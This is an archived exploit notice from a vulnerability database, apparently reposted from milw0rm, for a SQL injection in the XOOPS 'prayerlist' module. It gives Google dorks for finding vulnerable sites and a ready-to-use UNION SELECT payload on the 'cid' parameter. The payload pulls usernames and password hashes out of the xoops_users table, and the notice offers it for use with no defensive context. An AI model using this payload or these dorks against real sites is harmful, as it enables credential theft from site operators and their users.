Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19241
HistoryFeb 22, 2008 - 12:00 a.m.

XOOPS Module prayerlist SQL Injection(cid)

2008-02-2200:00:00
vulners.com
19

###############################################################

XOOPS Module prayerlist SQL Injection(cid)

###############################################################

AUTHOR : S@BUN

HOME : http://www.milw0rm.com/author/1334

MAİL : [email protected]

################################################################

DORK 1 : allinurl:"modules/prayerlist/index.php?pa"cid

DORK 2 : allinurl:

################################################################
EXPLOIT :

modules/prayerlist/index.php?pa=view&cid=-9999999//union//select//0,1,concat(uname,0x3a,pass)//from/**/xoops_users/*

################################################################

S@BUN i AM NOT HACKER S@BUN

################################################################